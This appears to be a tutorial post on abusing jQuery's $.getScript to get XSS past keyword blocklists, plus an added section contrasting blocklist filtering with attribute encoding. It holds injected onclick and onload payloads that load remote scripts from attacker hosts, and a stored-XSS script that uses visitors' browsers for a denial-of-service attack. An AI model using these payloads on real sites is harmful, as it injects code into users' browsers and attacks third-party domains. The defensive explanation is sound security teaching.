XSS: How to take advantage of $.getScript Function

    If an attacker can get $.getScript to run with a URL they control, they can execute any script they like.

    $.getScript loads a JavaScript file from a remote server and executes it, which is exactly what an attacker needs.

    In some applications an attacker controls the call itself or its URL parameter, and the call then becomes a Cross-Site Scripting (XSS) vector.

    The attacker could control an HTML tag like an input tag:
    Code:
    <input type=text onclick=...>
    Suppose the attacker controls the onclick handler, but the web application filters out particular tokens such as <script> and document. On its own, that filter may appear to prevent Cross-Site Scripting.

    However, as long as the web page includes the jQuery library, the attacker can bypass that filter with the $.getScript function, because the call contains none of the filtered tokens:
    Code:
    <input type=text onclick=$.getScript('http://<host>/file.js')>
    Here the attacker has placed file.js, containing the malicious JavaScript, on a server they control.

    As soon as a user clicks the input, that code runs in the user's browser, in the context of the vulnerable page.

    If an attacker can inject arbitrary HTML at all, the developer has already made a serious mistake; filtering a few keywords afterwards does not repair it.

    Here are some additional forms the $.getScript call can take, each of which loads and runs the remote file:
    Code:
    $.getScript(`//path-to-JS-file`, alert`1`);
    $.getScript`//path-to-JS-file`;
    $.getScript('//path-to-JS-file');
    Of course, fetching and running scripts, cross-origin ones in particular, is exactly what $.getScript is designed to do.
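    The failure mode above is a keyword blocklist applied to data that ends up inside an HTML attribute. The following example is added here and is not part of the original post: it contrasts such a blocklist with context-aware attribute encoding, using a payload modelled on the ones above with a constructed host name (attacker.example). The helper names (blocklistFilter, encodeForHtmlAttribute, renderInput, attributeNames, demo) are the example's own.

```javascript
// Added example (not from the original post): why a keyword blocklist fails
// against $.getScript placed in an event-handler attribute, and what
// context-aware output encoding does instead. All names are hypothetical.

// A naive filter of the kind the post describes: it strips a few
// dangerous-looking tokens and otherwise passes user input through.
function blocklistFilter(input) {
  return String(input)
    .replace(/<script[^>]*>/gi, '')
    .replace(/<\/script>/gi, '')
    .replace(/document\./gi, '');
}

// Proper defence: encode the HTML-significant characters so the value can
// only ever be attribute data, never an attribute boundary or a new attribute.
function encodeForHtmlAttribute(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(input).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Renders the input tag from the post with a user-controlled value attribute,
// passing the value through whichever "protection" the caller chooses.
function renderInput(value, protect) {
  return `<input type="text" value="${protect(value)}">`;
}

// Constructed sample input modelled on the post's payload: it closes the value
// attribute early and appends an onclick handler. Note it contains neither
// "<script" nor "document.", so the blocklist leaves it untouched.
const samplePayload = `x" onclick="$.getScript('//attacker.example/file.js')`;

// Minimal attribute parser used only for this demonstration: returns the
// lower-cased attribute names present on the first tag in the markup.
function attributeNames(html) {
  const tag = html.match(/<\w+\s+([^>]*)>/);
  if (!tag) return [];
  const names = [];
  const re = /([\w-]+)\s*=\s*"[^"]*"/g;
  let m;
  while ((m = re.exec(tag[1])) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Renders the same payload both ways and reports whether each rendering
// acquired an onclick attribute it was never meant to have.
function demo() {
  const unsafe = renderInput(samplePayload, blocklistFilter);
  const safe = renderInput(samplePayload, encodeForHtmlAttribute);
  return {
    unsafe,
    safe,
    unsafeGainedHandler: attributeNames(unsafe).includes('onclick'),
    safeGainedHandler: attributeNames(safe).includes('onclick'),
  };
}
```

    Run under Node, demo() shows that the blocklisted rendering has acquired an onclick attribute while the encoded rendering still carries only type and value. The encoded path is what a templating engine's attribute escaping does for you; the blocklisted path is the pattern the post is describing, and it fails regardless of how many keywords are added to the list.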

    In another scenario, the attacker injects JavaScript into the <img> tag of a profile image, so the payload is stored and served to other users:
    Code:
    <img src="/image.jpg"
    onload="$.getScript('http://<host>/index.html')" />

    function ddos(url) {
      $("body").append("<iframe id='ifr11323' style='display:none;' src='http://<host>.com/index.html'></iframe>");
    }

    <html><body>
    <h1>Iframe</h1>
    <script>
    ddos('http://<host1>/image.jpg',
         'http://<host2>/image.jpg');
    function ddos(url, url2) {
      window.setInterval(function () {
        $.getScript(url);
        $.getScript(url2);
      }, 1000);
    }
    </script>
    </body></html>
    Every page that displays the profile image now also carries the injected code, ready to run for every future visitor of that page.

    Whenever a visitor opens the page, the browser executes the injected JavaScript, which inserts a hidden <iframe> pointing at the attacker's domain.

    In effect, the attacker uses a Cross-Site Scripting vulnerability to turn ordinary visitors into participants in a denial-of-service attack against a chosen domain.